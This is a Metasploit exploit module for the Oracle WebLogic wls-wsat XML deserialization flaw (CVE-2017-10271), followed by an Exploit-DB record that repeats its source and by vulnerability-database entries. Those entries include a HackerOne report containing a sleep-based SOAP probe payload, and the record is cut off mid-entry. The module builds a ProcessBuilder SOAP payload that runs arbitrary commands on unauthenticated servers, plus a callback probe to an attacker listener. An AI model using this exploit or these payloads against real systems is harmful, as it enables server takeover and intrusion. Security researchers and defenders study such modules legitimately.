##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
  # Metasploit module for CVE-2017-10271. The WebLogic wls-wsat endpoint hands the
  # SOAP <work:WorkContext> header to java.beans.XMLDecoder, so an unauthenticated
  # POST can describe a java.lang.ProcessBuilder and have it started server-side.
  # Only HttpClient is mixed in; the server-side `check` path further down is
  # commented out, so this module has no working `check` method.
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  # Left disabled on purpose: the author notes below that HttpServer and HttpClient
  # could not be combined in one module at the time of writing.
  # include Msf::Exploit::Remote::HttpServer

  # Registers module metadata, targets and datastore options.
  #
  # @param info [Hash] base info supplied by the framework; merged via update_info.
  #
  # NOTE(review): the Description mentions SRVHOST, SRVPORT, HTTP_DELAY and URIPATH,
  # but none of those are registered here (HTTP_DELAY is commented out) and the
  # check that would use them is disabled -- the text is stale relative to the code.
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Oracle WebLogic wls-wsat Component Deserialization RCE',
        'Description' => %q(
The Oracle WebLogic WLS WSAT Component is vulnerable to a XML Deserialization
remote code execution vulnerability. Supported versions that are affected are
10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0 and 12.2.1.2.0. Discovered by Alexey Tyurin
of ERPScan and Federico Dotta of Media Service. Please note that SRVHOST, SRVPORT,
HTTP_DELAY, URIPATH and related HTTP Server variables are only used when executing a check
and will not be used when executing the exploit itself.
),
        'License' => MSF_LICENSE,
        'Author' => [
          'Kevin Kirsche <d3c3pt10n[AT]deceiveyour.team>', # Metasploit module
          'Luffin', # Proof of Concept
          'Alexey Tyurin', 'Federico Dotta' # Vulnerability Discovery
        ],
        'References' =>
          [
            ['URL', 'https://www.oracle.com/technetwork/topics/security/cpuoct2017-3236626.html'], # Security Bulletin
            ['URL', 'https://github.com/Luffin/CVE-2017-10271'], # Proof-of-Concept
            ['URL', 'https://github.com/kkirsche/CVE-2017-10271'], # Standalone Exploit
            ['CVE', '2017-10271'],
            ['EDB', '43458']
          ],
        'Platform' => %w{ win unix },
        'Arch' => [ ARCH_CMD ],
        # The 'Platform' value of the chosen target is what cmd_base/cmd_opt read.
        'Targets' =>
          [
            [ 'Windows Command payload', { 'Arch' => ARCH_CMD, 'Platform' => 'win' } ],
            [ 'Unix Command payload', { 'Arch' => ARCH_CMD, 'Platform' => 'unix' } ]
          ],
        'DisclosureDate' => "Oct 19 2017",
        # Note that this is by index, rather than name. It's generally easiest
        # just to put the default at the beginning of the list and skip this
        # entirely.
        'DefaultTarget' => 0
      )
    )

    # TARGETURI and RPORT default to the wls-wsat CoordinatorPortType on 7001;
    # TIMEOUT (seconds, Float) is passed straight to send_request_cgi in #exploit.
    register_options([
      OptString.new('TARGETURI', [true, 'The base path to the WebLogic WSAT endpoint', '/wls-wsat/CoordinatorPortType']),
      OptPort.new('RPORT', [true, "The remote port that the WebLogic WSAT endpoint listens on", 7001]),
      OptFloat.new('TIMEOUT', [true, "The timeout value of requests to RHOST", 20.0]),
      # Only meaningful for the disabled check method below.
      # OptInt.new('HTTP_DELAY', [true, 'Time that the HTTP Server will wait for the check payload', 10])
    ])
  end

  # Command interpreter for the selected target, keyed on target['Platform'].
  #
  # @return [String] 'cmd' for the Windows target, '/bin/sh' otherwise.
  def cmd_base
    if target['Platform'] == 'win'
      return 'cmd'
    else
      return '/bin/sh'
    end
  end

  # Interpreter flag that makes cmd_base run the next argument as a command string.
  #
  # @return [String] '/c' for the Windows target, '-c' otherwise.
  def cmd_opt
    if target['Platform'] == 'win'
      return '/c'
    else
      return '-c'
    end
  end

  #
  # This generates a XML payload that will execute the desired payload on the RHOST
  #
  # Builds the SOAP envelope whose WorkContext header describes a three-element
  # java.lang.ProcessBuilder argv [cmd_base, cmd_opt, payload] followed by start().
  # Works for both targets (the earlier "*nix only" comment was stale). The local
  # `xml` is the method's implicit return value.
  #
  # @return [String] the SOAP XML body to POST.
  def exploit_process_builder_payload
    # String#encode(xml: :text) entity-escapes &, < and > so the encoded command
    # text cannot terminate the <string> element or inject further XML.
    xml = %Q{<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java>
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3" >
<void index="0">
<string>#{cmd_base}</string>
</void>
<void index="1">
<string>#{cmd_opt}</string>
</void>
<void index="2">
<string>#{payload.encoded.encode(xml: :text)}</string>
</void>
</array>
<void method="start"/>
</void>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>}
  end

  #
  # This builds a XML payload that will generate a HTTP GET request to our SRVHOST
  # from the target machine.
  #
  # Companion of the disabled `check` below: the envelope makes the server open a
  # java.net.URL stream back to the module's listener. NOTE(review): `get_uri` is
  # not defined in this file; it presumably comes from the HttpServer mixin that is
  # commented out above, so calling this helper today would raise NoMethodError --
  # it is dead code until `check` is re-enabled.
  #
  # @return [String] the SOAP XML body for the callback probe.
  def check_process_builder_payload
    xml = %Q{<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.8" class="java.beans.XMLDecoder">
<void id="url" class="java.net.URL">
<string>#{get_uri.encode(xml: :text)}</string>
</void>
<void idref="url">
<void id="stream" method = "openStream" />
</void>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>}
  end

  #
  # In the event that a 'check' host responds, we should respond randomly so that we don't clog up
  # the logs too much with a no response error or similar.
  #
  # HttpServer callback for the disabled check path; only reachable once the
  # HttpServer mixin is included. Sets @received_request so a poller can notice.
  #
  # @param cli [Object] the connected client handed over by the server mixin.
  # @param request [Object] the incoming request; unused here.
  # @return [Boolean] true (value of the final assignment).
  def on_request_uri(cli, request)
    # NOTE(review): the trailing '<p>' is almost certainly meant to be '</p>';
    # left untouched because it is a runtime string.
    random_content = '<html><head></head><body><p>'+Rex::Text.rand_text_alphanumeric(20)+'<p></body></html>'
    send_response(cli, random_content)
    @received_request = true
  end

  #
  # The exploit method connects to the remote service and sends a randomly generated string
  # encapsulated within a SOAP XML body. This will start an HTTP server for us to receive
  # the response from. This is based off of the exploit technique from
  # exploits/windows/novell/netiq_pum_eval.rb
  #
  # This doesn't work as is because MSF cannot mix HttpServer and HttpClient
  # at the time of authoring this
  #
  # def check
  # start_service
  #
  # print_status('Sending the check payload...')
  # res = send_request_cgi({
  # 'method' => 'POST',
  # 'uri' => normalize_uri(target_uri.path),
  # 'data' => check_process_builder_payload,
  # 'ctype' => 'text/xml;charset=UTF-8'
  # }, datastore['TIMEOUT'])
  #
  # print_status("Waiting #{datastore['HTTP_DELAY']} seconds to see if the target requests our URI...")
  #
  # waited = 0
  # until @received_request
  # sleep 1
  # waited += 1
  # if waited > datastore['HTTP_DELAY']
  # stop_service
  # return Exploit::CheckCode::Safe
  # end
  # end
  #
  # stop_service
  # return Exploit::CheckCode::Vulnerable
  # end

  #
  # The exploit method connects to the remote service and sends the specified payload
  # encapsulated within a SOAP XML body.
  #
  # One POST to TARGETURI with Content-Type text/xml;charset=UTF-8, bounded by
  # TIMEOUT. The response is discarded: success is only observed through the
  # payload's own callback. For defenders, the observable artifact is exactly this
  # request -- a POST to the wls-wsat path whose WorkContext header names
  # java.lang.ProcessBuilder -- which is what the referenced vendor patch removes.
  def exploit
    send_request_cgi({
      'method' => 'POST',
      'uri' => normalize_uri(target_uri.path),
      'data' => exploit_process_builder_payload,
      'ctype' => 'text/xml;charset=UTF-8'
    }, datastore['TIMEOUT'])
  end
end
{"id": "EDB-ID:43924", "type": "exploitdb", "bulletinFamily": "exploit", "title": "Oracle WebLogic - wls-wsat Component Deserialization Remote Code Execution (Metasploit)", "description": "Oracle WebLogic - wls-wsat Component Deserialization Remote Code Execution (Metasploit). CVE-2017-10271. Remote exploit for Multiple platform. Tags: Metasplo...", "published": "2018-01-29T00:00:00", "modified": "2018-01-29T00:00:00", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "href": "https://www.exploit-db.com/exploits/43924/", "reporter": "Exploit-DB", "references": [], "cvelist": ["CVE-2017-10271"], "lastseen": "2018-01-29T18:52:53", "viewCount": 416, "enchantments": {"score": {"value": 6.1, "vector": "NONE", "modified": "2018-01-29T18:52:53", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-10271"]}, {"type": "attackerkb", "idList": ["AKB:7992242A-E0F4-4572-BE13-859467611F09"]}, {"type": "symantec", "idList": ["SMNTC-101304"]}, {"type": "hackerone", "idList": ["H1:576887"]}, {"type": "seebug", "idList": ["SSV:97009"]}, {"type": "fireeye", "idList": ["FIREEYE:399092589F455855881447C60B56C21A", "FIREEYE:C097B41677EDE5F95DB4B84AD6726751", "FIREEYE:2473273CA0F291BCEBB5F99AA3E4F256", "FIREEYE:6B4CFD4290F6444DFC070D828CEC509A"]}, {"type": "exploitdb", "idList": ["EDB-ID:43458", "EDB-ID:43392"]}, {"type": "zdt", "idList": ["1337DAY-ID-29668", "1337DAY-ID-29395"]}, {"type": "securelist", "idList": ["SECURELIST:2782756D428D10F166A1D130F4307D33", "SECURELIST:C7E3F6A27205B506CE8683317323C0BC"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:C22F157FABAD412B7D508C7EEC750856", "EXPLOITPACK:E47A4ABCB334901131160C872A570166"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:B49179B9854ECB9B3B25403D4C9D0804"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/MULTI/MISC/WEBLOGIC_DESERIALIZE_ASYNCRESPONSESERVICE", "MSF:EXPLOIT/MULTI/HTTP/ORACLE_WEBLOGIC_WSAT_DESERIALIZATION_RCE"]}, {"type": "nessus", "idList": 
["WEBLOGIC_2017_10271.NASL", "ORACLE_WEBLOGIC_SERVER_CPU_OCT_2017.NASL"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:146143"]}, {"type": "threatpost", "idList": ["THREATPOST:260D48C8E6CF572D5CE165F85C7265E6", "THREATPOST:12E93CDF8BAC1B158CE1737E859FDD80", "THREATPOST:D3FA06D667A0B326C1598C8BCD106E7D", "THREATPOST:420EE567E806D93092741D7BB375AC57", "THREATPOST:760547BA8017A91CB7219FE7629E28B3", "THREATPOST:5633BBF7C54D598EB76A7B3781EFD2CB", "THREATPOST:9530BF61FA72CF3E2B226C171BB8C5E7", "THREATPOST:E43EB029B562B5665C8385E16145288A", "THREATPOST:7E66A86C86BE8481D1B905B183CA42C3", "THREATPOST:555BCC102B10B8C6CABB0054595AC756"]}, {"type": "thn", "idList": ["THN:F03064A70C65D9BD62A8F5898BA276D2", "THN:EEB3BA59922DDC6B345B8E6C153593DA"]}, {"type": "talosblog", "idList": ["TALOSBLOG:A6B70436696A7578F1EF6B7090D11B59", "TALOSBLOG:3F14583676BF3FEC18226D8E465C8707", "TALOSBLOG:7B703A19FAC4E490CFFB2AE43C1606DF", "TALOSBLOG:E8F926D413AF8A060A5CA7289C0EAD20"]}, {"type": "pentestit", "idList": ["PENTESTIT:F5DFB26B34C75683830E664CBD58178F"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310811244"]}, {"type": "kitploit", "idList": ["KITPLOIT:7013881512724945934", "KITPLOIT:5052987141331551837", "KITPLOIT:5420210148456420402"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:9BA334FCEF38374A0B09A0614B2D74D4"]}, {"type": "impervablog", "idList": ["IMPERVABLOG:4F187FDBA230373382F26BA12E00F8E7"]}, {"type": "oracle", "idList": ["ORACLE:CPUOCT2017", "ORACLE:CPUOCT2017-3236626"]}], "modified": "2018-01-29T18:52:53", "rev": 2}, "vulnersScore": 6.1}, "sourceHref": "https://www.exploit-db.com/download/43924/", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n Rank = ExcellentRanking\r\n\r\n include Msf::Exploit::Remote::HttpClient\r\n # include Msf::Exploit::Remote::HttpServer\r\n\r\n def initialize(info = {})\r\n 
super(\r\n update_info(\r\n info,\r\n 'Name' => 'Oracle WebLogic wls-wsat Component Deserialization RCE',\r\n 'Description' => %q(\r\n The Oracle WebLogic WLS WSAT Component is vulnerable to a XML Deserialization\r\n remote code execution vulnerability. Supported versions that are affected are\r\n 10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0 and 12.2.1.2.0. Discovered by Alexey Tyurin\r\n of ERPScan and Federico Dotta of Media Service. Please note that SRVHOST, SRVPORT,\r\n HTTP_DELAY, URIPATH and related HTTP Server variables are only used when executing a check\r\n and will not be used when executing the exploit itself.\r\n ),\r\n 'License' => MSF_LICENSE,\r\n 'Author' => [\r\n 'Kevin Kirsche <d3c3pt10n[AT]deceiveyour.team>', # Metasploit module\r\n 'Luffin', # Proof of Concept\r\n 'Alexey Tyurin', 'Federico Dotta' # Vulnerability Discovery\r\n ],\r\n 'References' =>\r\n [\r\n ['URL', 'https://www.oracle.com/technetwork/topics/security/cpuoct2017-3236626.html'], # Security Bulletin\r\n ['URL', 'https://github.com/Luffin/CVE-2017-10271'], # Proof-of-Concept\r\n ['URL', 'https://github.com/kkirsche/CVE-2017-10271'], # Standalone Exploit\r\n ['CVE', '2017-10271'],\r\n ['EDB', '43458']\r\n ],\r\n 'Platform' => %w{ win unix },\r\n 'Arch' => [ ARCH_CMD ],\r\n 'Targets' =>\r\n [\r\n [ 'Windows Command payload', { 'Arch' => ARCH_CMD, 'Platform' => 'win' } ],\r\n [ 'Unix Command payload', { 'Arch' => ARCH_CMD, 'Platform' => 'unix' } ]\r\n ],\r\n 'DisclosureDate' => \"Oct 19 2017\",\r\n # Note that this is by index, rather than name. 
It's generally easiest\r\n # just to put the default at the beginning of the list and skip this\r\n # entirely.\r\n 'DefaultTarget' => 0\r\n )\r\n )\r\n\r\n register_options([\r\n OptString.new('TARGETURI', [true, 'The base path to the WebLogic WSAT endpoint', '/wls-wsat/CoordinatorPortType']),\r\n OptPort.new('RPORT', [true, \"The remote port that the WebLogic WSAT endpoint listens on\", 7001]),\r\n OptFloat.new('TIMEOUT', [true, \"The timeout value of requests to RHOST\", 20.0]),\r\n # OptInt.new('HTTP_DELAY', [true, 'Time that the HTTP Server will wait for the check payload', 10])\r\n ])\r\n end\r\n\r\n def cmd_base\r\n if target['Platform'] == 'win'\r\n return 'cmd'\r\n else\r\n return '/bin/sh'\r\n end\r\n end\r\n\r\n def cmd_opt\r\n if target['Platform'] == 'win'\r\n return '/c'\r\n else\r\n return '-c'\r\n end\r\n end\r\n\r\n\r\n #\r\n # This generates a XML payload that will execute the desired payload on the RHOST\r\n #\r\n def exploit_process_builder_payload\r\n # Generate a payload which will execute on a *nix machine using /bin/sh\r\n xml = %Q{<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\">\r\n <soapenv:Header>\r\n <work:WorkContext xmlns:work=\"http://bea.com/2004/06/soap/workarea/\">\r\n <java>\r\n <void class=\"java.lang.ProcessBuilder\">\r\n <array class=\"java.lang.String\" length=\"3\" >\r\n <void index=\"0\">\r\n <string>#{cmd_base}</string>\r\n </void>\r\n <void index=\"1\">\r\n <string>#{cmd_opt}</string>\r\n </void>\r\n <void index=\"2\">\r\n <string>#{payload.encoded.encode(xml: :text)}</string>\r\n </void>\r\n </array>\r\n <void method=\"start\"/>\r\n </void>\r\n </java>\r\n </work:WorkContext>\r\n </soapenv:Header>\r\n <soapenv:Body/>\r\n</soapenv:Envelope>}\r\n end\r\n\r\n #\r\n # This builds a XML payload that will generate a HTTP GET request to our SRVHOST\r\n # from the target machine.\r\n #\r\n def check_process_builder_payload\r\n xml = %Q{<soapenv:Envelope 
xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\">\r\n <soapenv:Header>\r\n <work:WorkContext xmlns:work=\"http://bea.com/2004/06/soap/workarea/\">\r\n <java version=\"1.8\" class=\"java.beans.XMLDecoder\">\r\n <void id=\"url\" class=\"java.net.URL\">\r\n <string>#{get_uri.encode(xml: :text)}</string>\r\n </void>\r\n <void idref=\"url\">\r\n <void id=\"stream\" method = \"openStream\" />\r\n </void>\r\n </java>\r\n </work:WorkContext>\r\n </soapenv:Header>\r\n <soapenv:Body/>\r\n</soapenv:Envelope>}\r\n end\r\n\r\n #\r\n # In the event that a 'check' host responds, we should respond randomly so that we don't clog up\r\n # the logs too much with a no response error or similar.\r\n #\r\n def on_request_uri(cli, request)\r\n random_content = '<html><head></head><body><p>'+Rex::Text.rand_text_alphanumeric(20)+'<p></body></html>'\r\n send_response(cli, random_content)\r\n\r\n @received_request = true\r\n end\r\n\r\n #\r\n # The exploit method connects to the remote service and sends a randomly generated string\r\n # encapsulated within a SOAP XML body. This will start an HTTP server for us to receive\r\n # the response from. 
This is based off of the exploit technique from\r\n # exploits/windows/novell/netiq_pum_eval.rb\r\n #\r\n # This doesn't work as is because MSF cannot mix HttpServer and HttpClient\r\n # at the time of authoring this\r\n #\r\n # def check\r\n # start_service\r\n #\r\n # print_status('Sending the check payload...')\r\n # res = send_request_cgi({\r\n # 'method' => 'POST',\r\n # 'uri' => normalize_uri(target_uri.path),\r\n # 'data' => check_process_builder_payload,\r\n # 'ctype' => 'text/xml;charset=UTF-8'\r\n # }, datastore['TIMEOUT'])\r\n #\r\n # print_status(\"Waiting #{datastore['HTTP_DELAY']} seconds to see if the target requests our URI...\")\r\n #\r\n # waited = 0\r\n # until @received_request\r\n # sleep 1\r\n # waited += 1\r\n # if waited > datastore['HTTP_DELAY']\r\n # stop_service\r\n # return Exploit::CheckCode::Safe\r\n # end\r\n # end\r\n #\r\n # stop_service\r\n # return Exploit::CheckCode::Vulnerable\r\n # end\r\n\r\n #\r\n # The exploit method connects to the remote service and sends the specified payload\r\n # encapsulated within a SOAP XML body.\r\n #\r\n def exploit\r\n send_request_cgi({\r\n 'method' => 'POST',\r\n 'uri' => normalize_uri(target_uri.path),\r\n 'data' => exploit_process_builder_payload,\r\n 'ctype' => 'text/xml;charset=UTF-8'\r\n }, datastore['TIMEOUT'])\r\n end\r\nend", "osvdbidlist": []}
{"cve": [{"lastseen": "2021-02-02T06:36:32", "description": "Vulnerability in the Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent: WLS Security). Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0 and 12.2.1.2.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via T3 to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in takeover of Oracle WebLogic Server. CVSS 3.0 Base Score 7.5 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H).", "edition": 5, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2017-10-19T17:29:00", "title": "CVE-2017-10271", "type": "cve", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-10271"], "modified": "2019-10-03T00:03:00", "cpe": ["cpe:/a:oracle:weblogic_server:10.3.6.0.0", "cpe:/a:oracle:weblogic_server:12.2.1.1.0", "cpe:/a:oracle:weblogic_server:12.1.3.0.0", "cpe:/a:oracle:weblogic_server:12.2.1.2.0"], "id": "CVE-2017-10271", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-10271", "cvss": {"score": 
5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}, "cpe23": ["cpe:2.3:a:oracle:weblogic_server:10.3.6.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:weblogic_server:12.2.1.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:weblogic_server:12.2.1.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:weblogic_server:12.1.3.0.0:*:*:*:*:*:*:*"]}], "attackerkb": [{"lastseen": "2020-11-18T06:43:10", "bulletinFamily": "info", "cvelist": ["CVE-2017-10271"], "description": "Vulnerability in the Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent: WLS Security). Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0 and 12.2.1.2.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via T3 to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in takeover of Oracle WebLogic Server. CVSS 3.0 Base Score 7.5 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H).\n\n \n**Recent assessments:** \n \n**wchen-r7** at May 23, 2019 5:44pm UTC reported:\n\nStraight forward and reliable exploitation. No auth required. WebLogic is quite well known and it is also bundled in other products. Should be a pentester\u2019s favorite.\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5**asoto-r7** at September 12, 2019 6:06pm UTC reported:\n\nStraight forward and reliable exploitation. No auth required. WebLogic is quite well known and it is also bundled in other products. 
Should be a pentester\u2019s favorite.\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5\n", "modified": "2020-09-02T00:00:00", "published": "2017-10-19T00:00:00", "id": "AKB:7992242A-E0F4-4572-BE13-859467611F09", "href": "https://attackerkb.com/topics/KjHcjsGuez/cve-2017-10271---oracle-weblogic-server-asyncresponseservice-deserialization-vulnerability", "type": "attackerkb", "title": "CVE-2017-10271 - Oracle WebLogic Server AsyncResponseService Deserialization Vulnerability", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "symantec": [{"lastseen": "2018-03-27T15:57:26", "bulletinFamily": "software", "cvelist": ["CVE-2017-10271"], "description": "### Description\n\nOracle WebLogic Server is prone to a remote security vulnerability in WLS Security. The vulnerability can be exploited over the 'HTTP' protocol. This vulnerability affects the following supported versions: 10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0, 12.2.1.2.0\n\n### Technologies Affected\n\n * Oracle Weblogic Server 10.3.6.0 \n * Oracle Weblogic Server 12.1.3.0 \n * Oracle Weblogic Server 12.2.1.1 \n * Oracle Weblogic Server 12.2.1.2 \n\n### Recommendations\n\n**Block external access at the network boundary, unless external parties require service.** \nFilter access to the affected computer at the network boundary if global access isn't needed. Restricting access to only trusted computers and networks might greatly reduce the likelihood of a successful exploit.\n\n**Deploy network intrusion detection systems to monitor network traffic for malicious activity.** \nDeploy NIDS to monitor network traffic for signs of anomalous or suspicious activity including unexplained incoming and outgoing traffic. This may indicate exploit attempts or activity that results from successful exploits.\n\n**Modify default ACL settings.** \nImplement database access control to limit the immediate impact of such vulnerabilities on the data and possibly the database itself. 
Ensure that applications are isolated from one another and from sensitive data through separate user accounts and restrictive ACL configurations\n\n**Run all software as a nonprivileged user with minimal access rights.** \nTo limit the impact of latent vulnerabilities, configure servers and other applications to run as a nonadministrative user with minimal access rights.\n\nUpdates are available. Please see the references or vendor advisory for more information.\n", "modified": "2017-10-17T00:00:00", "published": "2017-10-17T00:00:00", "id": "SMNTC-101304", "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/101304", "type": "symantec", "title": "Oracle WebLogic Server CVE-2017-10271 Remote Security Vulnerability", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}], "hackerone": [{"lastseen": "2019-07-02T07:43:34", "bulletinFamily": "bugbounty", "bounty": 0.0, "cvelist": ["CVE-2017-10271"], "description": "**Summary:**\nHappy Friday! The server at `\u2588\u2588\u2588\u2588\u2588\u2588` is vulnerable to CVE-2017-10271 \"Oracle WebLogic Server Remote Command Execution\".\n\n**Description:**\nThe following request takes 12 seconds (12000 milliseconds) to complete:\n```\nPOST /wls-wsat/RegistrationPortTypeRPC HTTP/1.1\nHost: \u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\nContent-Length: 423\ncontent-type: text/xml\nAccept-Encoding: gzip, deflate, compress\nAccept: */*\n\n<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\">\n <soapenv:Header>\n <work:WorkContext xmlns:work=\"http://bea.com/2004/06/soap/workarea/\">\n <java class=\"java.beans.XMLDecoder\">\n <object class=\"java.lang.Thread\" method=\"sleep\">\n <long>12000</long>\n </object>\n </java>\n </work:WorkContext>\n </soapenv:Header>\n <soapenv:Body/>\n</soapenv:Envelope>\n```\nThis proves that I have Java code execution on the remote server. 
\n\nref: https://techblog.mediaservice.net/2018/07/cve-2017-10271-oracle-weblogic-server-remote-command-execution-sleep-detection-payload/\n\nPublic exploits for this exist: https://github.com/c0mmand3rOpSec/CVE-2017-10271\nI was not able to use that script with a `ping` command, which might have been blocked by preventing outbound connections.\n\n## Suggested Mitigation/Remediation Actions\nPatch & possibly don't allow external access.\n\n## Impact\n\nCritical, RCE.", "modified": "2019-07-01T19:54:20", "published": "2019-05-10T22:23:31", "id": "H1:576887", "href": "https://hackerone.com/reports/576887", "type": "hackerone", "title": "U.S. Dept Of Defense: RCE on \u2588\u2588\u2588\u2588\u2588 via CVE-2017-10271", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "seebug": [{"lastseen": "2018-06-26T22:23:22", "description": "### \u6f0f\u6d1e\u63cf\u8ff0\r\n \u9ed1\u5ba2\u5229\u7528WebLogic \u53cd\u5e8f\u5217\u5316\u6f0f\u6d1e\uff08CVE-2017-3248\uff09\u548cWebLogic WLS \u7ec4\u4ef6\u6f0f\u6d1e\uff08CVE-2017-10271\uff09\u5bf9\u4f01\u4e1a\u670d\u52a1\u5668\u53d1\u8d77\u5927\u8303\u56f4\u8fdc\u7a0b\u653b\u51fb\uff0c\u6709\u5927\u91cf\u4f01\u4e1a\u7684\u670d\u52a1\u5668\u88ab\u653b\u9677\uff0c\u4e14\u88ab\u653b\u51fb\u4f01\u4e1a\u6570\u91cf\u5448\u73b0\u660e\u663e\u4e0a\u5347\u8d8b\u52bf\uff0c\u9700\u8981\u5f15\u8d77\u9ad8\u5ea6\u91cd\u89c6\u3002\u5176\u4e2d\uff0cCVE-2017-10271\u662f\u4e00\u4e2a\u6700\u65b0\u7684\u5229\u7528Oracle WebLogic\u4e2dWLS \u7ec4\u4ef6\u7684\u8fdc\u7a0b\u4ee3\u7801\u6267\u884c\u6f0f\u6d1e\uff0c\u5c5e\u4e8e\u6ca1\u6709\u516c\u5f00\u7ec6\u8282\u7684\u91ce\u5916\u5229\u7528\u6f0f\u6d1e\uff0c\u5927\u91cf\u4f01\u4e1a\u5c1a\u672a\u53ca\u65f6\u5b89\u88c5\u8865\u4e01\u3002\u5b98\u65b9\u5728 2017 \u5e74 10 \u6708\u4efd\u53d1\u5e03\u4e86\u8be5\u6f0f\u6d1e\u7684\u8865\u4e01\u3002\r\n \r\n 
\u8be5\u6f0f\u6d1e\u7684\u5229\u7528\u65b9\u6cd5\u8f83\u4e3a\u7b80\u5355\uff0c\u653b\u51fb\u8005\u53ea\u9700\u8981\u53d1\u9001\u7cbe\u5fc3\u6784\u9020\u7684 HTTP \u8bf7\u6c42\uff0c\u5c31\u53ef\u4ee5\u62ff\u5230\u76ee\u6807\u670d\u52a1\u5668\u7684\u6743\u9650\uff0c\u5371\u5bb3\u5de8\u5927\u3002\u7531\u4e8e\u6f0f\u6d1e\u8f83\u65b0\uff0c\u76ee\u524d\u4ecd\u7136\u5b58\u5728\u5f88\u591a\u4e3b\u673a\u5c1a\u672a\u66f4\u65b0\u76f8\u5173\u8865\u4e01\u3002\u9884\u8ba1\u5728\u6b64\u6b21\u7a81\u53d1\u4e8b\u4ef6\u4e4b\u540e\uff0c\u5f88\u53ef\u80fd\u51fa\u73b0\u653b\u51fb\u4e8b\u4ef6\u6570\u91cf\u6fc0\u589e\uff0c\u5927\u91cf\u65b0\u4e3b\u673a\u88ab\u653b\u9677\u7684\u60c5\u51b5\u3002\r\n\t\r\n \u653b\u51fb\u8005\u80fd\u591f\u540c\u65f6\u653b\u51fbWindows\u53caLinux\u4e3b\u673a\uff0c\u5e76\u5728\u76ee\u6807\u4e2d\u957f\u671f\u6f5c\u4f0f\u3002\u7531\u4e8eOracle 